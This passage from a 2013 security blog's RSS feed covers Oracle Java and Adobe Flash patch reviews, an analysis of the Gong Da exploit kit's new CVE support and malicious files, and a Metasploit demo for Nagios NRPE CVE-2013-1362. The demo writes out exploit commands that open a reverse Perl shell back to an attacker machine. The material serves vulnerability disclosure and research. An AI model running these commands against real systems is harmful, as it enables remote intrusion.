<p><a href="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/Oracle-Java-Update-21-Security-Levels.png"><img class="size-full wp-image-6475 aligncenter" alt="Oracle-Java-Update-21-Security-Levels" src="http://i1.wp.com/eromang.zataz.com/wp-content/uploads/Oracle-Java-Update-21-Security-Levels.png?resize=442%2C336" data-recalc-dims="1" /></a></p>
<p>&nbsp;</p>
<p>But, there is always a but with Oracle, they don&#8217;t seem to have enable, by default, the check for revocation using Certificate Revocation Lists (CRLs) despite that <a title="When a Signed Java JAR file is not Proof of Trust" href="http://eromang.zataz.com/2013/03/05/when-a-signed-java-jar-file-is-not-proof-of-trust/" target="_blank"><strong>some bad guys are using valid stollen and revoked certificates to sign malware&#8217;s</strong></a>.</p>
<p><a href="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/Oracle-Java-Update-21-CRLs-Checks.png"><img class="size-full wp-image-6476 aligncenter" alt="Oracle-Java-Update-21-CRLs-Checks" src="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/Oracle-Java-Update-21-CRLs-Checks.png?resize=436%2C69" data-recalc-dims="1" /></a></p>
<p>So we advise you to update asap, enable the CRL check, if you still have Oracle Java plug-in installed !</p>

<div class="wp_rp_wrap  wp_rp_plain" ><div class="wp_rp_content"><h3 class="related_post_title">I recommend you to read these related posts</h3><ul class="related_post wp_rp" style="visibility: visible"><li data-position="0" data-poid="in-5850" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/18/bye-bye-java-se-6-security-enhancements-in-java-se-7u10/" class="wp_rp_title">Bye Bye Java SE 6, Security Enhancements in Java SE 7U10</a></li><li data-position="1" data-poid="in-6478" data-post-type="none" ><a href="http://eromang.zataz.com/2013/04/20/java-7u17-applet-reflection-type-confusion-rce-metasploit-demo/" class="wp_rp_title">CVE-2013-2423 &#8211; Java 7u17 Applet Reflection Type Confusion RCE Metasploit Demo</a></li><li data-position="2" data-poid="in-6140" data-post-type="none" ><a href="http://eromang.zataz.com/2013/02/03/oracle-java-critical-patch-update-february-2013-review/" class="wp_rp_title">Oracle Java Critical Patch Update February 2013 Review</a></li><li data-position="3" data-poid="in-6256" data-post-type="none" ><a href="http://eromang.zataz.com/2013/02/20/oracle-java-critical-patch-update-february-2013-special-update-review/" class="wp_rp_title">Oracle Java Critical Patch Update February 2013 &#8211; Special Update Review</a></li><li data-position="4" data-poid="in-6307" data-post-type="none" ><a href="http://eromang.zataz.com/2013/03/04/oracle-update-to-java-7-update-17-and-to-java-6-update-43-but/" class="wp_rp_title">Oracle update to Java 7 Update 17 and to Java 6 Update 43, but&#8230;</a></li><li data-position="5" data-poid="in-6294" data-post-type="none" ><a href="http://eromang.zataz.com/2013/03/01/cve-2013-1493-aka-yet-another-oracle-java-0day/" class="wp_rp_title">CVE-2013-1493 aka Yet Another Oracle Java 0day</a></li><li data-position="6" data-poid="in-6302" data-post-type="none" ><a href="http://eromang.zataz.com/2013/03/03/oracle-java-exploits-and-0days-since-2012-interactive-timeline/" class="wp_rp_title">Oracle Java Exploits and 0days since 2012 Interactive Timeline</a></li><li data-position="7" data-poid="in-3648" data-post-type="none" ><a href="http://eromang.zataz.com/2012/03/31/cve-2012-0507-java-atomicreferencearray-type-violation-vulnerability-metasploit-demo/" class="wp_rp_title">CVE-2012-0507 Java AtomicReferenceArray Type Violation Vulnerability Metasploit Demo</a></li><li data-position="8" data-poid="in-3250" data-post-type="none" ><a href="http://eromang.zataz.com/2012/02/23/cve-2012-0500-oracle-java-web-start-plugin-command-line-argument-injection-metasploit-demo/" class="wp_rp_title">CVE-2012-0500 Oracle Java Web Start Plugin Command Line Argument Injection Metasploit Demo</a></li><li data-position="9" data-poid="in-6082" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/15/watering-hole-campaign-use-latest-java-and-ie-vulnerabilities/" class="wp_rp_title">Watering Hole Campaign Use Latest Java and IE Vulnerabilities</a></li></ul><div class="wp_rp_footer"><a class="wp_rp_backlink" target="_blank" href="http://www.zemanta.com/?wp-related-posts">Zemanta</a></div></div></div>
]]></content:encoded>
			<wfw:commentRss>http://eromang.zataz.com/2013/04/16/oracle-java-critical-patch-update-april-2013-review/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Gong Da Exploit Kit Add Java CVE-2013-1493 &amp; IE CVE-2012-4792 &amp; IE CVE-2012-4969 Support</title>
		<link>http://eromang.zataz.com/2013/04/15/gong-da-gondad-exploit-kit-add-java-cve-2013-1493-ie-cve-2012-4969-support/</link>
		<comments>http://eromang.zataz.com/2013/04/15/gong-da-gondad-exploit-kit-add-java-cve-2013-1493-ie-cve-2012-4969-support/#comments</comments>
		<pubDate>Sun, 14 Apr 2013 22:33:42 +0000</pubDate>
		<dc:creator>wow</dc:creator>
				<category><![CDATA[Various]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[CVE-2011-3544]]></category>
		<category><![CDATA[CVE-2012-0507]]></category>
		<category><![CDATA[CVE-2012-1723]]></category>
		<category><![CDATA[CVE-2012-1889]]></category>
		<category><![CDATA[CVE-2012-4681]]></category>
		<category><![CDATA[CVE-2012-4792]]></category>
		<category><![CDATA[CVE-2012-4969]]></category>
		<category><![CDATA[CVE-2012-5076]]></category>
		<category><![CDATA[CVE-2013-0422]]></category>
		<category><![CDATA[CVE-2013-0634]]></category>
		<category><![CDATA[CVE-2013-1493]]></category>
		<category><![CDATA[Flash]]></category>
		<category><![CDATA[Gondad]]></category>
		<category><![CDATA[Gong Da]]></category>
		<category><![CDATA[Java]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Oracle]]></category>

		<guid isPermaLink="false">http://eromang.zataz.com/?p=6461</guid>
		<description><![CDATA[Like other Exploit Kits, Gong Da has add support for Oracle Java CVE-2013-1493 vulnerability, fixed in Oracle Java 6 Update 17, has also add support for Microsoft Internet Explorer CVE-2012-4969 and CVE-2012-4792 vulnerabilities, fixed in an emergency patch in September 2012 and January 2013.
Here  [...]]]></description>
				<content:encoded><![CDATA[<p>Like other Exploit Kits, Gong Da has add support for Oracle Java <strong><a title="CVE-2013-1493 aka Yet Another Oracle Java 0day" href="http://eromang.zataz.com/2013/03/01/cve-2013-1493-aka-yet-another-oracle-java-0day/" target="_blank">CVE-2013-1493</a></strong> vulnerability, fixed in Oracle <a title="Oracle update to Java 7 Update 17 and to Java 6 Update 43, but…" href="http://eromang.zataz.com/2013/03/04/oracle-update-to-java-7-update-17-and-to-java-6-update-43-but/" target="_blank">Java 6 Update 17</a>, has also add support for Microsoft Internet Explorer <a title="Zero-Day Season Is Really Not Over Yet" href="http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/" target="_blank"><strong>CVE-2012-4969</strong></a> and <a title="Attack and IE 0day Informations Used Against Council on Foreign Relations" href="http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/" target="_blank"><strong>CVE-2012-4792</strong></a> vulnerabilities, fixed in an emergency patch in <a title="MS12-063 Out-of-Band Microsoft Security Update for Internet Explorer Fix 0day" href="http://eromang.zataz.com/2012/09/21/ms12-063-out-of-band-microsoft-security-update-for-internet-explorer-fix-0day/" target="_blank">September 2012</a> and <a title="Microsoft Out-Of-Band Patch for Internet Explorer CVE-2012-4792 Vulnerability" href="http://eromang.zataz.com/2013/01/14/microsoft-out-of-band-patch-for-internet-explorer-cve-2012-4792-vulnerability/" target="_blank">January 2013</a>.</p>
<p>Here is the new code for CVE-2013-1493.</p>
<p><a href="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/Capture-d’écran-2013-04-14-à-23.39.38.png"><img class="alignnone size-full wp-image-6462" alt="Capture d’écran 2013-04-14 à 23.39.38" src="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/Capture-d’écran-2013-04-14-à-23.39.38.png?resize=405%2C90" data-recalc-dims="1" /></a></p>
<p>And here the new code for CVE-2012-4792 (aka 4792.html) and CVE-2012-4969 (aka payload.html).</p>
<p><a href="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/Capture-d’écran-2013-04-14-à-23.39.48.png"><img class="alignnone size-full wp-image-6463" alt="Capture d’écran 2013-04-14 à 23.39.48" src="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/Capture-d’écran-2013-04-14-à-23.39.48.png?resize=782%2C71" data-recalc-dims="1" /></a></p>
<p>Also a new variant of CVE-2012-1889 (xml.html) has been introduced, reducing the detection rate by anti-viruses.</p>
<p><a href="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/Capture-d’écran-2013-04-14-à-23.40.15.png"><img class="alignnone  wp-image-6464" alt="Capture d’écran 2013-04-14 à 23.40.15" src="http://i2.wp.com/eromang.zataz.com/wp-content/uploads/Capture-d’écran-2013-04-14-à-23.40.15.png?resize=858%2C72" data-recalc-dims="1" /></a></p>
<p>As always this new version of Gong Da Exploit Kit has been discovered on a <a href="http://pastebin.com/qg33ss0N" target="_blank">Korean web site</a>.</p>
<p>Gong Da Pack has involve to the following diagram.</p>
<p><a href="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/Gong-Da-EK-1.5.jpg"><img class="alignnone size-medium wp-image-6465" alt="Gong Da EK 1.5" src="http://i0.wp.com/eromang.zataz.com/wp-content/uploads/Gong-Da-EK-1.5.jpg?resize=210%2C300" data-recalc-dims="1" /></a></p>
<p>Here under some information s regarding the different files:</p>
<ul>
<li><span style="line-height: 12.796875px;"><a href="https://www.virustotal.com/en/file/ced95dcf6161416cc2a65b8144de9d158ca09a86efc41b727cf233df5c7f261d/analysis/1365976375/" target="_blank">HcIa2.jar</a> (aka <a title="CVE-2011-3544 Java Applet Rhino Script Engine Metasploit Demo" href="http://eromang.zataz.com/2011/11/30/cve-2011-3544-java-applet-rhino-script-engine-metasploit-demo/" target="_blank">CVE-2011-3544</a>): 11/46 on VirusTotal.com<br />
</span></li>
<li><a href="https://www.virustotal.com/en/file/4aee9edc1191b47d0c931c5b4f96635f9bdae3cd815819b8922e9d70f0387b18/analysis/1365976479/" target="_blank">bzExj6.jar</a> (aka <a title="CVE-2012-0507 Java AtomicReferenceArray Type Violation Vulnerability Metasploit Demo" href="http://eromang.zataz.com/2012/03/31/cve-2012-0507-java-atomicreferencearray-type-violation-vulnerability-metasploit-demo/" target="_blank">CVE-2012-0507</a>): 14/45 on VirusTotal.com</li>
<li><a href="https://www.virustotal.com/en/file/4ce19d3f6ac2232cb727e38e49581f7a74cd807554b77f14e41e1dab60ddfc50/analysis/1365976563/" target="_blank">BnkLbvY3.jar</a> (aka <a title="CVE-2012-1723 Oracle Java Applet Field Bytecode Verifier Cache RCE Metasploit Demo" href="http://eromang.zataz.com/2012/07/10/cve-2012-1723-oracle-java-applet-field-bytecode-verifier-cache-rce-metasploit-demo/" target="_blank">CVE-2012-1723</a>): 19/46 on VirusTotal.com</li>
<li><a href="https://www.virustotal.com/en/file/6dfe1e928fcb6fe6c2f4084d177785e31727ceefafdd3ec06bc33a1189d4855f/analysis/1365976661/" target="_blank">iCNpns4.jar</a> (aka <a title="Java 7 Applet RCE 0day Gondvv CVE-2012-4681 Metasploit Demo" href="http://eromang.zataz.com/2012/08/27/java-7-applet-rce-0day-gondvv-cve-2012-4681-metasploit-demo/" target="_blank">CVE-2012-4681</a>): 28/46 on VirusTotal.com</li>
<li><a href="https://www.virustotal.com/en/file/7146cb2da664a4ee295680c3d126c4d4c09b4886f5da96ce6da2abcf618c74be/analysis/1365976737/" target="_blank">JdtDFRW1.jar</a> (aka <a title="CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo" href="http://eromang.zataz.com/2012/11/12/cve-2012-5076-java-applet-jax-ws-remote-code-execution-metasploit-demo/" target="_blank">CVE-2012-5076</a>): 16/46 on VirusTotal.com</li>
<li><a href="https://www.virustotal.com/en/file/f48498fb48133cef9d253fb8c988cad58dd7e88b16c416528c0c9a62dbbf4074/analysis/1365976809/" target="_blank">TolxrJG6.jar</a> (aka <a title="Java Applet JMX 0day Remote Code Execution Metasploit Demo" href="http://eromang.zataz.com/2013/01/10/java-applet-jmx-0day-remote-code-execution-metasploit-demo/" target="_blank">CVE-2013-0422</a>): 19/46 on VirusTotal.com</li>
<li><a href="https://www.virustotal.com/en/file/5136f2b8468b0e4d0b9fd0a4a0f3b45d3525c96e78d98f42174185d6b1e39b1b/analysis/" target="_blank">FQxzUjYP.jar</a> (aka <a title="CVE-2013-1493 aka Yet Another Oracle Java 0day" href="http://eromang.zataz.com/2013/03/01/cve-2013-1493-aka-yet-another-oracle-java-0day/" target="_blank">CVE-2013-1493</a>): 16/46 on VirusTotal.com</li>
<li><a href="https://www.virustotal.com/en/file/d2db2ef63cf893485b3870a3664a0cfe33d0e69b87ab3d6b7fc9cdb931668a27/analysis/1365976948/" target="_blank">GwDFO7.swf</a> (aka <a title="Gong Da / Gondad Exploit Pack Add Flash CVE-2013-0634 Support" href="http://eromang.zataz.com/2013/02/26/gong-da-gondad-exploit-pack-add-flash-cve-2013-0634-support/" target="_blank">CVE-2013-0634</a>): 10/46 on VirusTotal.com</li>
<li><a href="https://www.virustotal.com/en/file/a46260d57157580de90887598f518b473d4bb1ee065560de4977fd48eee71f1a/analysis/" target="_blank">xmlcoreOld.html</a> (aka <a title="MS12-043 Microsoft XML Core Services Vulnerability Metasploit Demo" href="http://eromang.zataz.com/2012/06/16/cve-2012-1889-microsoft-xml-core-services-vulnerability-metasploit-demo/" target="_blank">CVE-2012-1889</a>): 18/46 on VirusTotal.com</li>
<li><a href="https://www.virustotal.com/en/file/915f722812f20b44559396a1a739b661c9930f5dbf223848009838f518720aad/analysis/" target="_blank">xml.html</a> (aka <a title="MS12-043 Microsoft XML Core Services Vulnerability Metasploit Demo" href="http://eromang.zataz.com/2012/06/16/cve-2012-1889-microsoft-xml-core-services-vulnerability-metasploit-demo/" target="_blank">CVE-2012-1889</a>): 3/35 on VirusTotal.com</li>
<li><a href="https://www.virustotal.com/en/file/5695d96e5733f2234b21b9ce2e02b952a6b0323a1abf1dba2db8b36dddb1c7fb/analysis/" target="_blank">xmlcoreNew.html</a> (aka <a title="MS12-043 Microsoft XML Core Services Vulnerability Metasploit Demo" href="http://eromang.zataz.com/2012/06/16/cve-2012-1889-microsoft-xml-core-services-vulnerability-metasploit-demo/" target="_blank">CVE-2012-1889</a>): 10/45 on VirusTotal.com</li>
<li><a href="https://www.virustotal.com/en/file/b1e5c252b13b69416d507b18eae2cb1b014f1672ce6e9e7c72680dfec3f65b05/analysis/" target="_blank">4792.html</a> (aka <a title="Microsoft Internet Explorer CButton Vulnerability Metasploit Demo" href="http://eromang.zataz.com/2012/12/30/microsoft-internet-explorer-cdwnbindinfo-vulnerability-metasploit-demo/" target="_blank">CVE-2012-4792</a>): 1/46 on VirusTotal.com</li>
<li><a href="https://www.virustotal.com/en/file/2658fcc1a5c792cf32f875f121ff50c11b34563872e49a4f951cf9a9e00e3755/analysis/" target="_blank">xyaKEg.html</a> and <a href="https://www.virustotal.com/en/file/5b2b83cfb0f28652d342409508586d3acd55a19be9c201a721cd8f449106db0f/analysis/" target="_blank">payload.html</a> (aka <a title="CVE-2012-4969 Microsoft Internet Explorer execCommand Vulnerability Metasploit Demo" href="http://eromang.zataz.com/2012/09/17/microsoft-internet-explorer-execcommand-vulnerability-metasploit-demo/" target="_blank">CVE-2012-4969</a>): 5/46 on VirusTotal.com</li>
</ul>
<p>Normally Gong Da was used against gamers, but this time the loaded malware seem to be different (analysis on <a href="http://www.threatexpert.com/report.aspx?md5=25c267d65ee7863c1071a112307c6e1c" target="_blank"><strong>ThreatExpert</strong></a>)</p>

<div class="wp_rp_wrap  wp_rp_plain" ><div class="wp_rp_content"><h3 class="related_post_title">I recommend you to read these related posts</h3><ul class="related_post wp_rp" style="visibility: visible"><li data-position="0" data-poid="in-6281" data-post-type="none" ><a href="http://eromang.zataz.com/2013/02/26/gong-da-gondad-exploit-pack-add-flash-cve-2013-0634-support/" class="wp_rp_title">Gong Da / Gondad Exploit Pack Add Flash CVE-2013-0634 Support</a></li><li data-position="1" data-poid="in-6057" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/13/gong-da-gondad-exploit-pack-add-java-cve-2013-0422-support/" class="wp_rp_title">Gong Da / Gondad Exploit Pack Add Java CVE-2013-0422 support</a></li><li data-position="2" data-poid="in-5897" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/24/year-2012-main-exploitable-vulnerabilities-interactive-timeline/" class="wp_rp_title">Year 2012 Main Exploitable Vulnerabilities Interactive Timeline</a></li><li data-position="3" data-poid="in-5826" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/05/kaixin-exploit-kit-evolutions/" class="wp_rp_title">KaiXin Exploit Kit Evolutions</a></li><li data-position="4" data-poid="in-5850" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/18/bye-bye-java-se-6-security-enhancements-in-java-se-7u10/" class="wp_rp_title">Bye Bye Java SE 6, Security Enhancements in Java SE 7U10</a></li><li data-position="5" data-poid="in-6082" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/15/watering-hole-campaign-use-latest-java-and-ie-vulnerabilities/" class="wp_rp_title">Watering Hole Campaign Use Latest Java and IE Vulnerabilities</a></li><li data-position="6" data-poid="in-5794" data-post-type="none" ><a href="http://eromang.zataz.com/2012/11/24/gong-da-gondad-exploit-pack-add-adobe-flash-cve-2012-1535-support/" class="wp_rp_title">Gong Da / Gondad Exploit Pack Add Adobe Flash CVE-2012-1535 Support</a></li><li data-position="7" data-poid="in-5785" data-post-type="none" ><a href="http://eromang.zataz.com/2012/11/17/gong-da-gondad-exploit-pack-add-java-cve-2012-5076-support/" class="wp_rp_title">Gong Da / Gondad Exploit Pack Add Java CVE-2012-5076 support</a></li><li data-position="8" data-poid="in-3946" data-post-type="none" ><a href="http://eromang.zataz.com/2012/08/27/oracle-java-0day-and-the-myth-of-a-targeted-attack/" class="wp_rp_title">Oracle Java 0day and the Myth of a Targeted Attack</a></li><li data-position="9" data-poid="in-6157" data-post-type="none" ><a href="http://eromang.zataz.com/2013/02/13/microsoft-february-2013-patch-tuesday-review/" class="wp_rp_title">Microsoft February 2013 Patch Tuesday Review</a></li></ul><div class="wp_rp_footer"><a class="wp_rp_backlink" target="_blank" href="http://www.zemanta.com/?wp-related-posts">Zemanta</a></div></div></div>
]]></content:encoded>
			<wfw:commentRss>http://eromang.zataz.com/2013/04/15/gong-da-gondad-exploit-kit-add-java-cve-2013-1493-ie-cve-2012-4969-support/feed/</wfw:commentRss>
		<slash:comments>32</slash:comments>
		</item>
		<item>
		<title>CVE-2013-1362 Nagios Remote Plugin Executor Arbitrary Command Execution Metasploit Demo</title>
		<link>http://eromang.zataz.com/2013/04/12/cve-2013-1362-nagios-remote-plugin-executor-arbitrary-command-execution-metasploit-demo/</link>
		<comments>http://eromang.zataz.com/2013/04/12/cve-2013-1362-nagios-remote-plugin-executor-arbitrary-command-execution-metasploit-demo/#comments</comments>
		<pubDate>Fri, 12 Apr 2013 21:48:30 +0000</pubDate>
		<dc:creator>wow</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[CVE-2013-1362]]></category>
		<category><![CDATA[Nagios]]></category>
		<category><![CDATA[NRPE]]></category>

		<guid isPermaLink="false">http://eromang.zataz.com/?p=6454</guid>
		<description><![CDATA[Timeline :
Vulnerability discovered and reported to vendor by Rudolph Pereira
Vulnerability patched by vendor the 2012-12-21
Vulnerability publicly disclosed by Rudolph Pereira the 2013-02-21
Metasploit PoC provided the 2013-03-19
PoC provided by :
Rudolph Pereira
jwpari
Reference(s)  [...]]]></description>
				<content:encoded><![CDATA[<h4>Timeline :</h4>
<p>Vulnerability discovered and reported to vendor by Rudolph Pereira<br />
Vulnerability patched by vendor the 2012-12-21<br />
Vulnerability publicly disclosed by Rudolph Pereira the 2013-02-21<br />
Metasploit PoC provided the 2013-03-19</p>
<h4><strong>PoC provided by :</strong></h4>
<p><a href="http://www.occamsec.com/vulnerabilities.html" target="_blank">Rudolph Pereira</a><br />
jwpari</p>
<h4><strong>Reference(s) :</strong></h4>
<p><a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1362" target="_blank">CVE-2013-1362</a><br />
<a href="http://osvdb.org/90582" target="_blank">OSVDB-90582</a><br />
<a href="http://www.securityfocus.com/bid/58142" target="_blank">BID-58142</a></p>
<h4><strong>Affected version(s) :</strong></h4>
<p>Nagios Remote Plugin Executor (NRPE) prior to 2.14</p>
<h4><strong>Tested on Ubuntu 12.10 x86 </strong>with :</h4>
<p>Nagios Remote Plugin Executor (NRPE) 2.13</p>
<h4><strong>Description :</strong></h4>
<p>The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.</p>
<h4><strong>Commands :</strong></h4>
<pre>use exploit/linux/misc/nagios_nrpe_arguments
set RHOST 192.168.178.54
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.36
exploit

id
uname -a
ifconfig</pre>
<p><iframe width="560" height="315" src="http://www.youtube.com/embed/OBgjp9gheBM" frameborder="0" allowfullscreen=""></iframe></p>

<div class="wp_rp_wrap  wp_rp_plain" ><div class="wp_rp_content"><h3 class="related_post_title">I recommend you to read these related posts</h3><ul class="related_post wp_rp" style="visibility: visible"><li data-position="0" data-poid="in-6107" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/17/cve-2012-6096-nagios3-history-cgi-vulnerability-metasploit-demo/" class="wp_rp_title">CVE-2012-6096 Nagios3 history.cgi Vulnerability Metasploit Demo</a></li><li data-position="1" data-poid="in-1607" data-post-type="none" ><a href="http://eromang.zataz.com/2011/02/06/cve-2010-3867-proftpd-iac-remote-root-exploit/" class="wp_rp_title">CVE-2010-3867 : ProFTPD IAC Remote Root Exploit</a></li><li data-position="2" data-poid="in-6231" data-post-type="none" ><a href="http://eromang.zataz.com/2013/02/18/foxit-reader-plugin-url-processing-vulnerability-metasploit-demo/" class="wp_rp_title">Foxit Reader Plugin URL Processing Vulnerability Metasploit Demo</a></li><li data-position="3" data-poid="in-3246" data-post-type="none" ><a href="http://eromang.zataz.com/2012/02/17/cve-2012-0209-horde-3-3-12-backdoor-metasploit-demo/" class="wp_rp_title">CVE-2012-0209 Horde 3.3.12 Backdoor Metasploit Demo</a></li><li data-position="4" data-poid="in-6419" data-post-type="none" ><a href="http://eromang.zataz.com/2013/04/03/cve-2013-1892-mongodb-nativehelper-apply-remote-code-execution-metasploit-demo/" class="wp_rp_title">CVE-2013-1892 MongoDB nativeHelper.apply Remote Code Execution Metasploit Demo</a></li><li data-position="5" data-poid="in-3125" data-post-type="none" ><a href="http://eromang.zataz.com/2012/01/15/cve-2011-4642-splunk-search-remote-code-execution-metasploit-demo/" class="wp_rp_title">CVE-2011-4642 Splunk Search Remote Code Execution Metasploit Demo</a></li><li data-position="6" data-poid="in-6328" data-post-type="none" ><a href="http://eromang.zataz.com/2013/03/09/cve-2013-1763-sock_diag-vulnerability-in-linux-kernel-3-3-to-3-8-demo/" class="wp_rp_title">CVE-2013-1763 SOCK_DIAG vulnerability in Linux kernel 3.3 to 3.8 Demo</a></li><li data-position="7" data-poid="in-6278" data-post-type="none" ><a href="http://eromang.zataz.com/2013/02/25/cve-2013-0431-java-applet-jmx-remote-code-execution-metasploit-demo/" class="wp_rp_title">CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo</a></li><li data-position="8" data-poid="in-3652" data-post-type="none" ><a href="http://eromang.zataz.com/2012/03/31/ms12-020-microsoft-remote-desktop-rdp-dos-metasploit-demo/" class="wp_rp_title">MS12-020 Microsoft Remote Desktop (RDP) DoS Metasploit Demo</a></li><li data-position="9" data-poid="in-3807" data-post-type="none" ><a href="http://eromang.zataz.com/2012/06/10/cve-2012-2763-gimp-script-fu-server-buffer-overflow-metasploit-demo/" class="wp_rp_title">CVE-2012-2763 GIMP script-fu Server Buffer Overflow Metasploit Demo</a></li></ul><div class="wp_rp_footer"><a class="wp_rp_backlink" target="_blank" href="http://www.zemanta.com/?wp-related-posts">Zemanta</a></div></div></div>
]]></content:encoded>
			<wfw:commentRss>http://eromang.zataz.com/2013/04/12/cve-2013-1362-nagios-remote-plugin-executor-arbitrary-command-execution-metasploit-demo/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>APSB13-11 &#8211; Adobe Flash April 2013 Security Bulletin Review</title>
		<link>http://eromang.zataz.com/2013/04/09/apsb13-11-adobe-flash-april-2013-security-bulletin-review/</link>
		<comments>http://eromang.zataz.com/2013/04/09/apsb13-11-adobe-flash-april-2013-security-bulletin-review/#comments</comments>
		<pubDate>Tue, 09 Apr 2013 19:47:38 +0000</pubDate>
		<dc:creator>wow</dc:creator>
				<category><![CDATA[Vulnerability Management]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[APSB13-11]]></category>
		<category><![CDATA[CVE-2013-1378]]></category>
		<category><![CDATA[CVE-2013-1379]]></category>
		<category><![CDATA[CVE-2013-1380]]></category>
		<category><![CDATA[CVE-2013-2555]]></category>
		<category><![CDATA[Flash]]></category>

		<guid isPermaLink="false">http://eromang.zataz.com/?p=6450</guid>
		<description><![CDATA[Adobe has release, the 9 April 2013, during his April Patch Tuesday, one Adobe Flash security bulletin dealing with four vulnerabilities. This security bulletin has a Critical severity rating.
APSB13-11 - Security updates available for Adobe Flash Player
APSB13-11 is concerning :

Adobe Flash  [...]]]></description>
				<content:encoded><![CDATA[<p>Adobe has release, the 9 April 2013, during his <a href="http://www.adobe.com/support/security/" target="_blank">April Patch Tuesday</a>, one Adobe Flash security bulletin dealing with four vulnerabilities. This security bulletin has a <a href="http://www.adobe.com/support/security/severity_ratings.html" target="_blank">Critical</a> severity rating.</p>
<h4>APSB13-11 - Security updates available for Adobe Flash Player</h4>
<p><strong><a href="http://www.adobe.com/support/security/bulletins/apsb13-11.html" target="_blank">APSB13-11</a> </strong>is concerning :</p>
<ul>
<li>Adobe Flash Player 11.6.602.180 and earlier versions for Windows and Macintosh</li>
<li>Adobe Flash Player 11.2.202.275  and earlier versions for Linux</li>
<li>Adobe Flash Player 11.1.115.48 and earlier versions for Android 4.x</li>
<li>Adobe Flash Player 11.1.111.44 and earlier versions for Android 3.x and 2.x</li>
<li>Adobe AIR 3.6.0.6090 and earlier versions for Windows, Macintosh and Android</li>
<li>Adobe AIR 3.6.0.6090 SDK &amp; Compiler and earlier version</li>
</ul>
<p><a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1378" target="_blank">CVE-2013-1378</a> (<span style="color: #ff0000;"><strong>7.5</strong></span> CVSS base score), <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1379" target="_blank">CVE-2013-1379</a> (<span style="color: #ff0000;"><strong>7.5</strong></span> CVSS base score) and <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1380" target="_blank">CVE-2013-1380</a> (<span style="color: #ff0000;"><strong>7.5</strong></span> CVSS base score) have been discovered and privately reported by Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna of the <a href="http://google.com/">Google Security Team</a>. <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2555" target="_blank">CVE-2013-2555</a> (<span style="color: #ff0000;"><strong>10.0</strong></span> CVSS base score) has been discovered and privately reported by a VUPEN Security reported through TippingPoint&#8217;s <a href="http://www.zerodayinitiative.com/">Zero Day Initiative</a>.</p>

<div class="wp_rp_wrap  wp_rp_plain" ><div class="wp_rp_content"><h3 class="related_post_title">I recommend you to read these related posts</h3><ul class="related_post wp_rp" style="visibility: visible"><li data-position="0" data-poid="in-6550" data-post-type="none" ><a href="http://eromang.zataz.com/2013/05/14/apsb13-14-adobe-flash-may-2013-security-bulletin-review/" class="wp_rp_title">APSB13-14 &#8211; Adobe Flash May 2013 Security Bulletin Review</a></li><li data-position="1" data-poid="in-5841" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/12/apsb12-27-adobe-flash-december-2012-security-bulletin-review/" class="wp_rp_title">APSB12-27 &#8211; Adobe Flash December 2012 Security Bulletin Review</a></li><li data-position="2" data-poid="in-6032" data-post-type="none" ><a href="http://eromang.zataz.com/2013/01/09/apsb13-01-adobe-flash-january-2013-security-bulletin-review/" class="wp_rp_title">APSB13-01 &#8211; Adobe Flash January 2013 Security Bulletin Review</a></li><li data-position="3" data-poid="in-5771" data-post-type="none" ><a href="http://eromang.zataz.com/2012/11/07/apsb12-24-adobe-november-2012-patch-tuesday-review/" class="wp_rp_title">APSB12-24 &#8211; Adobe November 2012 Patch Tuesday Review</a></li><li data-position="4" data-poid="in-4042" data-post-type="none" ><a href="http://eromang.zataz.com/2012/10/08/apsb12-22-adobe-october-2012-patch-tuesday-review/" class="wp_rp_title">APSB12-22 &#8211; Adobe October 2012 Patch Tuesday Review</a></li><li data-position="5" data-poid="in-3915" data-post-type="none" ><a href="http://eromang.zataz.com/2012/08/19/adobe-august-2012-patch-tuesday-review/" class="wp_rp_title">Adobe August 2012 Patch Tuesday Review</a></li><li data-position="6" data-poid="in-5909" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/27/adobe-flash-2012-vulnerabilities-review/" class="wp_rp_title">Adobe Flash 2012 Vulnerabilities Review</a></li><li data-position="7" data-poid="in-5838" data-post-type="none" ><a href="http://eromang.zataz.com/2012/12/12/microsoft-december-2012-patch-tuesday-review/" class="wp_rp_title">Microsoft December 2012 Patch Tuesday Review</a></li><li 